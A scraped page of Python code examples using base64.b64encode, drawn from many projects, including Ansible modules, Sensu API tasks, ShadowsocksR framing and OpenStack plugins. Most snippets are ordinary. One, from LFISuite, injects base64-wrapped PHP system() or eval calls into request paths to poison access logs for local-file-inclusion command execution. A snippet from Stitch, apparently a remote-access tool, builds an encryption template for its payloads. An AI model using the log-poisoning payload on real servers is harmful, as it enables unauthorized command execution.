python类b64encode()的实例源码

bslurp.py 文件源码 项目:openstack-deploy 作者: yaoice 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def copy_from_host(module):
    """Read a file on the host and return it through the module result.

    Reads the ``compress`` and ``src`` module parameters. The module is
    failed when ``src`` does not exist or is not readable. Otherwise the
    module exits with the base64 of the (optionally zlib-compressed) file
    bytes, the SHA-1 hex digest of the uncompressed bytes, the permission
    bits formatted with ``oct`` and the source path.

    :param module: object exposing ``params``, ``fail_json`` and ``exit_json``
    """
    params = module.params
    compress = params.get('compress')
    src = params.get('src')

    # Validate the source before reading it.
    if not os.path.exists(src):
        module.fail_json(msg="file not found: {}".format(src))
    if not os.access(src, os.R_OK):
        module.fail_json(msg="file is not readable: {}".format(src))

    permission_bits = os.stat(src).st_mode & 0o777

    with open(src, 'rb') as handle:
        contents = handle.read()

    # The digest always covers the uncompressed bytes.
    digest = hashlib.sha1(contents).hexdigest()
    if compress:
        payload = zlib.compress(contents)
    else:
        payload = contents

    module.exit_json(
        content=base64.b64encode(payload),
        sha1=digest,
        mode=oct(permission_bits),
        source=src
    )
store.py 文件源码 项目:kafka_store 作者: smyte 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def save(self, buffer):
        """Insert ``buffer`` as an object named ``prefix`` joined with its path.

        The rewound file of the buffer is wrapped in a
        ``http.MediaIoBaseUpload`` with the ``application/octet-stream``
        type. The request body carries the base64 of ``buffer.md5`` as
        ``md5Hash`` and the stringified ``buffer.count`` as metadata.
        """
        object_name = urljoin(self.prefix, buffer.path)

        payload = buffer.get_rewound_file()
        md5_digest_b64 = base64.b64encode(buffer.md5).decode('ascii')

        upload = http.MediaIoBaseUpload(payload, 'application/octet-stream')
        request_body = {
            'md5Hash': md5_digest_b64,
            'metadata': {'count': str(buffer.count)},
        }
        request = self.objects.insert(
            media_body=upload,
            name=object_name,
            body=request_body,
            bucket=self.bucket,
        )
        request.execute()
payload_code.py 文件源码 项目:Stitch 作者: nathanlopez 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def get_encryption():
    """Return generated source text for the AES helper functions.

    The template is filled positionally with ``st_obf[0]`` (emitted as the
    name of the key variable), ``aes_encoded`` (the base64 literal that is
    decoded into that variable) and ``aes_abbrev``; all three are read from
    module scope.
    """
    template = '''
import base64
from Crypto import Random
from Crypto.Cipher import AES

abbrev = '{2}'
{0} = base64.b64decode('{1}')

def encrypt(raw):
    iv = Random.new().read( AES.block_size )
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return (base64.b64encode( iv + cipher.encrypt( raw ) ) )

def decrypt(enc):
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return cipher.decrypt( enc[16:] )
'''
    key_variable = st_obf[0]
    return template.format(key_variable, aes_encoded, aes_abbrev)

################################################################################
#                       st_protocol.py stitch_gen variables                    #
################################################################################
NNTPCryptography.py 文件源码 项目:newsreap 作者: caronc 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def encode_public_key(self):
        """
        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it. We encode it as such and
        return it.

        Returns None when writing ``self.public_pem()`` raises a
        TypeError (the key wasn't initialized yet).
        """
        # Imported locally so this method does not depend on which
        # StringIO flavour the module imported.
        from io import BytesIO

        # gzip emits bytes, so the in-memory target has to be a byte
        # buffer; a text buffer rejects those writes on Python 3.
        fileobj = BytesIO()
        with GzipFile(fileobj=fileobj, mode="wb") as f:
            try:
                f.write(self.public_pem())
            except TypeError:
                # It wasn't initialized yet
                return None

        # Read the buffer only after the GzipFile is closed so the
        # gzip trailer has been flushed into it.
        return b64encode(fileobj.getvalue())
app2.py 文件源码 项目:IotCenter 作者: panjanek 项目源码 文件源码 阅读 42 收藏 0 点赞 0 评论 0
def handleServerCall(self, payload):
        """Handle a JSON callback received from the server.

        ``payload`` is a JSON document; when it carries a ``command`` key
        the command is logged and dispatched:

        * ``blink`` / ``reboot`` -- only logged.
        * ``photo`` -- the photo file is read, base64 encoded and sent
          through ``self.service.sendMessage`` as a JSON message.
        * anything else -- logged as unknown.

        Payloads without a ``command`` key are ignored.
        """
        self.logger.info("Handling server callback with payload {0}".format(payload))
        payloadDict = json.loads(payload)
        if "command" not in payloadDict:
            return

        command = payloadDict["command"]
        self.logger.info("Received command: {0}".format(command))
        if command == "blink":
            self.logger.info("BLINK!!!")
        elif command == "reboot":
            self.logger.info("REBOOT!!!")
        elif command == "photo":
            self.logger.info("PHOTO!!!")
            photoFile = "/home/pi/puszcz.jpg"
            # Close the file before sending; the handle is not needed
            # once the bytes are in memory.
            with open(photoFile, mode='rb') as photo:
                photoData = photo.read()
            # b64encode returns bytes on Python 3, which json.dumps cannot
            # serialize; decode to text (base64 output is pure ASCII).
            base64data = base64.b64encode(photoData).decode('ascii')
            self.service.sendMessage(json.dumps({'image': base64data, 'type': 'jpg'}))
        else:
            self.logger.info("Command '{0}' unknown".format(command))
stone_serializers.py 文件源码 项目:DropboxConnect 作者: raguay 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def encode_primitive(self, validator, value):
        """Encode a primitive ``value`` according to its ``validator``.

        If an alias validator is registered for ``validator`` it is called
        with ``value`` first. Void encodes to None, timestamps are formatted
        with the validator's format, bytes are passed through for msgpack
        and base64-encoded to ASCII text otherwise; every other value is
        returned unchanged, except booleans under an Integer validator.
        """
        if validator in self.alias_validators:
            extra_check = self.alias_validators[validator]
            extra_check(value)

        if isinstance(validator, bv.Void):
            return None
        if isinstance(validator, bv.Timestamp):
            return _strftime(value, validator.format)
        if isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                return value
            return base64.b64encode(value).decode('ascii')
        if isinstance(validator, bv.Integer) and isinstance(value, bool):
            # bool is a subclass of int, so it passes Integer validation;
            # encode it as ``0``/``1`` rather than ``False``/``True``.
            return int(value)
        return value
configurator.py 文件源码 项目:Home-Assistant 作者: jmart518 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def main(args):
    """Start the HTTP(S) server and serve until interrupted.

    :param args: command line arguments; when non-empty, ``args[0]`` is
        passed to ``load_settings`` before the server is created.

    When ``CREDENTIALS`` is set it is replaced (module-wide) by its base64
    encoding and ``AuthHandler`` is used; otherwise ``RequestHandler``.
    When ``SSL_CERTIFICATE`` is set the listening socket is wrapped in TLS.
    If ``BASEPATH`` is set the process changes into it before serving.
    """
    global HTTPD, CREDENTIALS
    if args:
        load_settings(args[0])
    print("Starting server")
    server_address = (LISTENIP, LISTENPORT)
    if CREDENTIALS:
        CREDENTIALS = base64.b64encode(bytes(CREDENTIALS, "utf-8"))
        Handler = AuthHandler
    else:
        Handler = RequestHandler
    if not SSL_CERTIFICATE:
        HTTPD = HTTPServer(server_address, Handler)
    else:
        HTTPD = socketserver.TCPServer(server_address, Handler)
        # ssl.wrap_socket() is deprecated and was removed in Python 3.12;
        # build a server-side context and wrap the socket through it.
        context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        context.load_cert_chain(certfile=SSL_CERTIFICATE, keyfile=SSL_KEY)
        HTTPD.socket = context.wrap_socket(HTTPD.socket, server_side=True)
    print('Listening on: %s://%s:%i' % ('https' if SSL_CERTIFICATE else 'http',
                                        LISTENIP,
                                        LISTENPORT))
    if BASEPATH:
        os.chdir(BASEPATH)
    HTTPD.serve_forever()
utils.py 文件源码 项目:NS_Proj 作者: drstarry 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def _b64_text(raw):
    """Base64-encode ``raw`` (text or bytes) and return a native string."""
    if not isinstance(raw, bytes):
        raw = raw.encode("utf-8")
    encoded = b64encode(raw)
    # b64encode returns bytes on Python 3; keep the result printable and
    # concatenable with "..." on both major versions.
    if not isinstance(encoded, str):
        encoded = encoded.decode("ascii")
    return encoded


def vPrint(actor, sent, otherActor, toPrint, base64encode=True):
    """does verbose printing of stuff, with cutoffs for length and base 64
    encoding

    Nothing is printed unless the module-level ``VERBOSE`` flag is true.

    :param actor: name shown on the left of the arrow
    :param sent: true prints ``actor -> otherActor``, false prints
        ``actor <- otherActor``
    :param otherActor: name shown on the right of the arrow
    :param toPrint: a string or a list of strings; other types are printed
        as they are
    :param base64encode: base64-encode strings / list items before printing

    Strings are cut to 100 characters after encoding; list items are cut to
    100 characters before encoding. ``...`` marks a cut value.
    """
    if not VERBOSE:
        return

    arrow = "->" if sent else "<-"
    # Pad short labels to 12 columns so the output lines up.
    label = ("%s %s %s" % (actor, arrow, otherActor)).ljust(12)

    if isinstance(toPrint, str):
        if base64encode:
            toPrint = _b64_text(toPrint)
        if len(toPrint) > 100:
            toPrint = toPrint[:100] + "..."
    elif isinstance(toPrint, list):
        # Only append the ellipsis when something was actually cut off
        # (items of exactly 100 characters are complete).
        if base64encode:
            toPrint = [_b64_text(x) if len(x) <= 100
                       else _b64_text(x[:100]) + '...' for x in toPrint]
        else:
            toPrint = [x if len(x) <= 100
                       else x[:100] + '...' for x in toPrint]
    # Single parenthesised argument: prints identically on Python 2 and 3.
    print("%s: <%s>" % (label, toPrint))
connection.py 文件源码 项目:python-libjuju 作者: juju 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def _http_headers(self):
        """Build the HTTP headers needed to reach this Connection's endpoint.

        :return: An empty dictionary when no usertag is set, otherwise a
            dictionary holding a Basic ``Authorization`` header built from
            the usertag and the password (empty string when unset).

        """
        if not self.usertag:
            return {}

        password = self.password or ''
        credentials = u'{}:{}'.format(self.usertag, password)
        encoded = base64.b64encode(credentials.encode()).decode()
        return {'Authorization': 'Basic {}'.format(encoded)}
feed.py 文件源码 项目:cbapi-python 作者: carbonblack 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def __init__(self, **kwargs):
        """Store the feed descriptor fields and inline icon files.

        :param kwargs: descriptor fields; kept as ``self.data``.
        :raises CbIconError: if an existing icon file cannot be read or
            encoded.

        For ``icon`` and ``icon_small``: when the field is present and
        names an existing path, the field value is replaced by the base64
        encoding of that file's bytes. Values that are not existing paths
        are left untouched.
        """
        # these fields are required in every feed descriptor
        self.required = ["name", "display_name",
                         "summary", "tech_data", "provider_url"]
        self.optional = ["category", "icon", "version", "icon_small"]
        self.noemptystrings = ["name", "display_name", "summary", "tech_data", "category"]
        self.data = kwargs

        # if they are present, set the icon fields of the data to hold
        # the base64 encoded file data from their path
        for icon_field in ["icon", "icon_small"]:
            if icon_field in self.data and os.path.exists(self.data[icon_field]):
                icon_path = self.data.pop(icon_field)
                try:
                    # Context manager closes the handle even when reading
                    # or encoding fails.
                    with open(icon_path, "rb") as icon_file:
                        self.data[icon_field] = base64.b64encode(icon_file.read())
                except Exception as err:
                    raise CbIconError("Unknown error reading/encoding icon data: %s" % err)
lfisuite.py 文件源码 项目:LFISuite 作者: D35m0nd142 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def send_access_log_cmd(cmd,host,keyword):
    """Send one request whose path embeds ``cmd``.

    When ``keyword`` contains ``_PHP`` its last four characters are dropped
    and ``cmd`` is embedded directly, or base64-wrapped in an ``eval`` call
    if it contains a space; otherwise ``cmd`` is base64-wrapped in a
    ``system`` call. The request is a GET when the keyword contains ``GET``
    and a HEAD otherwise, sent with the module-level ``gen_headers``.
    """
    if "_PHP" in keyword:
        keyword = keyword[:-4]
        if " " in cmd:
            b64cmd = base64.b64encode(cmd)
            path = "/<?php eval(base64_decode('%s'));?>" % b64cmd
        else:
            path = "/<?php %s?>" % cmd
    else:
        b64cmd = base64.b64encode(cmd)
        path = "/<?php system(base64_decode('%s'));?>" % b64cmd

    session = NoURLEncodingSession()
    url = "%s/%s" % (host, path)

    if "GET" in keyword:
        session.get(url, headers=gen_headers)
    else:
        session.head(url, headers=gen_headers)
tasks.py 文件源码 项目:sensu_drive 作者: ilavender 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def sensu_event_resolve(message):
    """POST a resolve request for the event named by ``message['entity']``.

    ``message['entity']`` is split on ``:`` into the client and check
    names, which are sent as JSON to ``<SENSU_API_URL>/resolve`` with HTTP
    basic authentication. A 202 status releases the connection; any other
    status is logged as an error. Exceptions are logged and re-raised.
    """
    API_URL = settings.SENSU_API_URL + '/resolve'
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    userAndPass = base64.b64encode(credentials.encode()).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % userAndPass,
    }

    try:
        client_name, check_name = message['entity'].split(':')
        body = json.dumps({"client": client_name, "check": check_name})
        reply = http.request('POST', API_URL, body=body, headers=headers)
        status = reply.status

        if status != 202:
            logger.error('response: %s' % str(status))
        else:
            reply.release_conn()

    except:
        logger.error("sensu_event_resolve failed resolving entity: %s" % message['entity'])
        raise
tasks.py 文件源码 项目:sensu_drive 作者: ilavender 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def sensu_client_delete(message):
    """Send a DELETE for the client named by ``message['client']``.

    The request goes to ``<SENSU_API_URL>/clients/<client>`` with HTTP
    basic authentication.

    Returns True on a 202 status (after releasing the connection) and
    False otherwise, logging the status. Exceptions are logged and
    re-raised.
    """
    API_URL = settings.SENSU_API_URL + '/clients/' + message['client']
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    userAndPass = base64.b64encode(credentials.encode()).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % userAndPass,
    }

    try:
        reply = http.request('DELETE', API_URL, headers=headers)
        status = reply.status

        if status != 202:
            logger.error("sensu_client_delete api request failed: %s" % str(status))
            return False
        reply.release_conn()
        return True
    except:
        logger.error("sensu_client_delete failed deleting client: %s" % message['client'])
        raise
tasks.py 文件源码 项目:sensu_drive 作者: ilavender 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def sensu_result_delete(message):
    """Send a DELETE for one check result of one client.

    The request goes to ``<SENSU_API_URL>/results/<client>/<check>`` with
    HTTP basic authentication, using ``message['client']`` and
    ``message['check']``.

    Returns True on a 204 status (after releasing the connection) and
    False otherwise, logging the status. Exceptions are logged and
    re-raised.
    """
    client_name = message['client']
    API_URL = settings.SENSU_API_URL + '/results/' + client_name + '/' + message['check']
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    userAndPass = base64.b64encode(credentials.encode()).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % userAndPass,
    }

    try:
        reply = http.request('DELETE', API_URL, headers=headers)
        status = reply.status

        if status != 204:
            logger.error("sensu_result_delete api request failed: %s" % str(status))
            return False
        reply.release_conn()
        return True
    except:
        logger.error("sensu_result_delete failed deleting client: %s check: %s" % (message['client'], message['check']))
        raise
ororo.py 文件源码 项目:plugin.video.exodus 作者: lastship 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def __init__(self):
        """Set up the endpoints, credentials and request headers.

        The user name and password are read from the ``ororo.user`` and
        ``ororo.pass`` settings and sent as an HTTP Basic ``Authorization``
        header.
        """
        self.priority = 1
        self.language = ['en']
        self.domains = ['ororo.tv']
        self.base_link = 'https://ororo.tv'
        self.moviesearch_link = '/api/v2/movies'
        self.tvsearch_link = '/api/v2/shows'
        self.movie_link = '/api/v2/movies/%s'
        self.show_link = '/api/v2/shows/%s'
        self.episode_link = '/api/v2/episodes/%s'

        self.user = control.setting('ororo.user')
        self.password = control.setting('ororo.pass')

        # b64encode needs bytes and returns bytes on Python 3; convert on
        # both sides so the header is plain text instead of "b'...'" and
        # non-ASCII credentials do not break the implicit ASCII encoding.
        credentials = '%s:%s' % (self.user, self.password)
        if not isinstance(credentials, bytes):
            credentials = credentials.encode('utf-8')
        token = base64.b64encode(credentials)
        if not isinstance(token, str):
            token = token.decode('ascii')

        self.headers = {
        'Authorization': 'Basic %s' % token,
        'User-Agent': 'Exodus for Kodi'
        }
service_account.py 文件源码 项目:oscars2016 作者: 0x0ece 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def _to_json(self, strip, to_serialize=None):
        """Create the JSON representation of this credentials object.

        Overridden because PKCS#12 keys are not in general JSON
        serializable: the value stored under the PKCS#12 key is
        base64-encoded before delegating to the parent implementation.

        Args:
            strip: array, An array of names of members to exclude from the
                   JSON.
            to_serialize: dict, (Optional) The properties for this object
                          that will be serialized. This allows callers to
                          modify before serializing. When given, it is
                          updated in place.

        Returns:
            string, a JSON representation of this instance, suitable to pass to
            from_json().
        """
        if to_serialize is None:
            # Shallow copy so the instance's own attributes stay untouched.
            to_serialize = copy.copy(self.__dict__)

        raw_key = to_serialize.get(_PKCS12_KEY)
        if raw_key is not None:
            to_serialize[_PKCS12_KEY] = base64.b64encode(raw_key)

        parent = super(ServiceAccountCredentials, self)
        return parent._to_json(strip, to_serialize=to_serialize)
console.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def get_console_log(session, arg_dict):
    """Return the tail of a domain's console log, compressed and encoded.

    :param session: not used by this function.
    :param arg_dict: mapping that must contain ``dom_id``, a value that
        ``int()`` can parse.
    :returns: base64 of the zlib-compressed data returned by
        ``_last_bytes`` for the domain's console log file.
    :raises dom0_pluginlib.PluginError: if ``dom_id`` is missing, if it
        raises ValueError when converted to int, or if reading the log
        raises IOError.
    """
    # NOTE(review): the nested try/finally and the comma-style ``except``
    # below look like deliberate compatibility with an old Python
    # interpreter -- confirm before modernizing this function.
    try:
        raw_dom_id = arg_dict['dom_id']
    except KeyError:
        raise dom0_pluginlib.PluginError("Missing dom_id")
    try:
        dom_id = int(raw_dom_id)
    except ValueError:
        raise dom0_pluginlib.PluginError("Invalid dom_id")

    # The log path is built from the numeric domain id only.
    logfile = open(CONSOLE_LOG_FILE_PATTERN % dom_id, 'rb')
    try:
        try:
            log_content = _last_bytes(logfile)
        except IOError, e:  # noqa
            msg = "Error reading console: %s" % e
            logging.debug(msg)
            raise dom0_pluginlib.PluginError(msg)
    finally:
        # Always close the log file, whether or not reading succeeded.
        logfile.close()

    return base64.b64encode(zlib.compress(log_content))
test_agent.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def test_inject_file_with_old_agent(self):
        """inject_file with an agent that only reports 'injectfile'.

        Expects the path and contents to be decoded, joined with a comma,
        re-encoded as one base64 value and written as an ``injectfile``
        record.
        """
        # NOTE: this is an alias of FAKE_ARG_DICT, not a copy; the
        # assignments below update the shared dictionary as well.
        arg_dict = FAKE_ARG_DICT
        request_id = arg_dict["id"]
        decoded_path = base64.b64decode(arg_dict["b64_path"])
        decoded_file = base64.b64decode(arg_dict["b64_contents"])
        combined_b64 = base64.b64encode("%s,%s" % (decoded_path, decoded_file))

        self.mock_patch_object(self.agent, '_get_agent_features', 'injectfile')

        expected_value = {"name": "injectfile", "value": combined_b64}
        arg_dict["value"] = json.dumps(expected_value)
        arg_dict["path"] = "data/host/%s" % request_id

        self.agent.inject_file(self.agent, FAKE_ARG_DICT)

        self.agent._wait_for_agent.assert_called_once()
        self.agent.xenstore.write_record.assert_called_with(self.agent,
                                                            arg_dict)
        self.agent._get_agent_features.assert_called_once()
stone_serializers.py 文件源码 项目:Projects 作者: it2school 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def encode_primitive(self, validator, value):
        """Return the encoded form of a primitive ``value``.

        An alias validator registered for ``validator`` is run on ``value``
        first. The encoding then depends on the validator type: Void gives
        None, Timestamp gives the formatted string, Bytes gives the raw
        value for msgpack or base64 ASCII text otherwise, and a bool under
        an Integer validator gives ``0``/``1``. Anything else is returned
        as it is.
        """
        if validator in self.alias_validators:
            self.alias_validators[validator](value)

        if isinstance(validator, bv.Void):
            encoded = None
        elif isinstance(validator, bv.Timestamp):
            encoded = _strftime(value, validator.format)
        elif isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                encoded = value
            else:
                encoded = base64.b64encode(value).decode('ascii')
        elif isinstance(validator, bv.Integer) and isinstance(value, bool):
            # bool passes Integer validation because it subclasses int, but
            # it should be emitted as a number, not ``True``/``False``.
            encoded = int(value)
        else:
            encoded = value
        return encoded
auth_chain.py 文件源码 项目:shadowsocksR-b 作者: hao35954514 项目源码 文件源码 阅读 49 收藏 0 点赞 0 评论 0
def client_udp_pre_encrypt(self, buf):
        """Encrypt and frame an outgoing client UDP packet.

        On first use the user id and key are taken from a ``uid:key``
        protocol parameter; when it is absent or cannot be parsed, a random
        4-byte id and the server key are used instead.

        The returned packet is: the payload encrypted by an ``'rc4'``
        Encryptor, ``rand_len`` random bytes, 3 bytes of auth data, the
        4-byte user id XOR-ed with the first 4 bytes of the auth data HMAC,
        and the first byte of the HMAC (keyed with the user key) of all
        preceding bytes.
        """
        if self.user_key is None:
            protocol_param = to_bytes(self.server_info.protocol_param)
            if b':' in protocol_param:
                try:
                    # Split on a bytes separator: splitting bytes with a
                    # text ':' raises TypeError on Python 3, which used to
                    # be swallowed and silently dropped the configured key.
                    items = protocol_param.split(b':')
                    user_key = self.hashfunc(items[1]).digest()
                    user_id = struct.pack('<I', int(items[0]))
                except Exception:
                    # Best effort: fall back to the defaults below.
                    pass
                else:
                    # Assign both together so a parse failure never leaves
                    # a key without a matching id.
                    self.user_key = user_key
                    self.user_id = user_id
            if self.user_key is None:
                self.user_id = os.urandom(4)
                self.user_key = self.server_info.key
        authdata = os.urandom(3)
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()
        # Mask the user id with the first four bytes of the auth HMAC.
        uid = struct.unpack('<I', self.user_id)[0] ^ struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', uid)
        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.encrypt(buf)
        buf = out_buf + os.urandom(rand_len) + authdata + uid
        return buf + hmac.new(self.user_key, buf, self.hashfunc).digest()[:1]
auth_chain.py 文件源码 项目:shadowsocksR-b 作者: hao35954514 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def server_udp_pre_encrypt(self, buf, uid):
        """Encrypt and frame an outgoing server UDP packet for ``uid``.

        The key is the one registered for ``uid``; for an unknown ``uid``
        it is the server key when no users are configured and the received
        IV otherwise.

        The returned packet is: the payload encrypted by an ``'rc4'``
        Encryptor, ``rand_len`` random bytes, 7 bytes of auth data and the
        first byte of the HMAC (keyed with the selected key) of all
        preceding bytes.
        """
        server_info = self.server_info
        if uid in server_info.users:
            user_key = server_info.users[uid]
        else:
            uid = None
            if server_info.users:
                user_key = server_info.recv_iv
            else:
                user_key = server_info.key

        authdata = os.urandom(7)
        md5data = hmac.new(server_info.key, authdata, self.hashfunc).digest()
        rand_len = self.udp_rnd_data_len(md5data, self.random_server)

        # The cipher key is the base64 of the user key followed by the
        # base64 of the auth data HMAC.
        cipher_key = to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data))
        encryptor = encrypt.Encryptor(cipher_key, 'rc4')
        framed = encryptor.encrypt(buf) + os.urandom(rand_len) + authdata
        checksum = hmac.new(user_key, framed, self.hashfunc).digest()[:1]
        return framed + checksum
auth_chain.py 文件源码 项目:shadowsocksR-b 作者: hao35954514 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def server_udp_post_decrypt(self, buf):
        """Verify and decrypt an incoming UDP packet on the server.

        The trailing 8 bytes are read as 3 bytes of auth data, a 4-byte
        masked user id and a 1-byte checksum. The key is the one registered
        for the unmasked user id; for an unknown id it is the server key
        when no users are configured and the received IV otherwise.

        Returns ``(b'', None)`` when the checksum does not match, otherwise
        ``(payload, uid)`` where ``uid`` is None for an unknown user.
        """
        server_info = self.server_info
        authdata = buf[-8:-5]
        md5data = hmac.new(server_info.key, authdata, self.hashfunc).digest()

        # Undo the XOR mask applied to the user id by the sender.
        masked_uid = struct.unpack('<I', buf[-5:-1])[0]
        mask = struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', masked_uid ^ mask)

        if uid in server_info.users:
            user_key = server_info.users[uid]
        else:
            uid = None
            if server_info.users:
                user_key = server_info.recv_iv
            else:
                user_key = server_info.key

        expected = hmac.new(user_key, buf[:-1], self.hashfunc).digest()[:1]
        if expected != buf[-1:]:
            return (b'', None)

        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        cipher_key = to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data))
        encryptor = encrypt.Encryptor(cipher_key, 'rc4')
        # Drop the 8-byte trailer and the random padding before decrypting.
        payload = encryptor.decrypt(buf[:-8 - rand_len])
        return (payload, uid)
protocol.py 文件源码 项目:privcount 作者: privcount 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def handshake_hmac_get(handshake_key, prefix, server_cookie,
                           client_cookie):
        '''
        Return the base-64 encoding of
        HMAC(handshake_key, prefix | server_cookie | client_cookie).

        The result is checked with handshake_hmac_verify in an assert
        before it is returned.
        '''
        cookies = server_cookie + client_cookie
        raw_hmac = get_hmac(handshake_key, prefix, cookies)
        encoded_hmac = b64encode(raw_hmac)
        assert PrivCountProtocol.handshake_hmac_verify(encoded_hmac,
                                                       handshake_key,
                                                       prefix,
                                                       server_cookie,
                                                       client_cookie)
        return encoded_hmac
keystone_utils.py 文件源码 项目:charm-keystone 作者: openstack 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def get_ssl_ca_settings():
    """ Get the Certificate Authority settings required to use the CA

    The settings are only filled in when the 'https-service-endpoints'
    config option is set to a true value.

    :returns: Dictionary with https_keystone and ca_cert set, or an empty
              dictionary
    """
    ca_data = {}
    endpoints_flag = config('https-service-endpoints')
    if not (endpoints_flag and bool_from_string(endpoints_flag)):
        return ca_data

    # Pass CA cert as client will need it to
    # verify https connections
    bundle = get_ca(user=SSH_USER).get_ca_bundle()
    ca_data['https_keystone'] = 'True'
    ca_data['ca_cert'] = b64encode(bundle)
    return ca_data
keystone_utils.py 文件源码 项目:charm-keystone 作者: openstack 项目源码 文件源码 阅读 43 收藏 0 点赞 0 评论 0
def get_ssl_ca_settings():
    """ Get the Certificate Authority settings required to use the CA

    :returns: Dictionary with https_keystone and ca_cert set when the
              'https-service-endpoints' config option is true, otherwise
              an empty dictionary
    """
    https_flag = config('https-service-endpoints')
    enabled = https_flag and bool_from_string(https_flag)
    if enabled:
        # The client needs the CA cert to verify https connections.
        authority = get_ca(user=SSH_USER)
        bundle = authority.get_ca_bundle()
        return {
            'https_keystone': 'True',
            'ca_cert': b64encode(bundle),
        }
    return {}
util.py 文件源码 项目:FRG-Crowdsourcing 作者: 97amarnathk 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def get_disqus_sso_payload(user):
    """Return remote_auth_s3 and api_key for user.

    Returns the tuple ``(message, timestamp, sig, public_key)``: the base64
    of the user's JSON data (an empty object when ``user`` is false), the
    current Unix time, and the hex HMAC-SHA1 of ``"<message> <timestamp>"``
    keyed with the secret key. All four items are None when either Disqus
    key is missing from the application config.
    """
    public_key = current_app.config.get('DISQUS_PUBLIC_KEY')
    secret_key = current_app.config.get('DISQUS_SECRET_KEY')
    if not (public_key and secret_key):
        return None, None, None, None

    if user:
        fields = {
            'id': user.id,
            'username': user.name,
            'email': user.email_addr,
        }
    else:
        fields = {}
    data = simplejson.dumps(fields)

    # Encode the data to base64 and sign it together with a timestamp.
    message = base64.b64encode(data)
    timestamp = int(time.time())
    signed_text = '%s %s' % (message, timestamp)
    sig = hmac.HMAC(secret_key, signed_text, hashlib.sha1).hexdigest()

    return message, timestamp, sig, public_key
upload_t2_results.py 文件源码 项目:TanksAndTemples 作者: IntelVCL 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def generate_md5_file(md5_check_fn, scene_list):
    """Write a checksum listing for the ``.ply`` and ``.log`` file of each scene.

    :param md5_check_fn: path of the listing to create (overwritten).
    :param scene_list: iterable of scene path prefixes; ``.ply`` and
        ``.log`` are appended to each one.

    For every scene two lines of the form ``<file>###<base64 md5>`` are
    written, the ``.ply`` line first. A file that does not exist gets an
    empty checksum. Each checksum is also printed.
    """
    # The context manager closes the listing even if hashing fails.
    with open(md5_check_fn, 'wb') as md5_check:
        for scene in scene_list:
            ply_file = scene + '.ply'
            log_file = scene + '.log'
            # Missing files get empty *bytes*: b64encode rejects text on
            # Python 3.
            if os.path.isfile(ply_file):
                md5_ply_file = generate_file_md5(ply_file, blocksize=2**20)
            else:
                md5_ply_file = b''
            if os.path.isfile(log_file):
                md5_log_file = generate_file_md5(log_file, blocksize=2**20)
            else:
                md5_log_file = b''
            content_md5_log = base64.b64encode(md5_log_file)
            content_md5_ply = base64.b64encode(md5_ply_file)
            print('md5_ply_file: ', ply_file, content_md5_ply)
            print('md5_log_file: ',log_file, content_md5_log)
            for file_name, content_md5 in ((ply_file, content_md5_ply),
                                           (log_file, content_md5_log)):
                line = "%s###%s\n" % (file_name, content_md5.decode('UTF-8'))
                # The listing is opened in binary mode, so write bytes.
                md5_check.write(line.encode('UTF-8'))
sessions.py 文件源码 项目:swjtu-pyscraper 作者: Desgard 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def _tag(value):
    """Convert ``value`` into a tagged, JSON-friendly structure.

    Tuples, UUIDs, bytes, objects with a callable ``__html__`` and
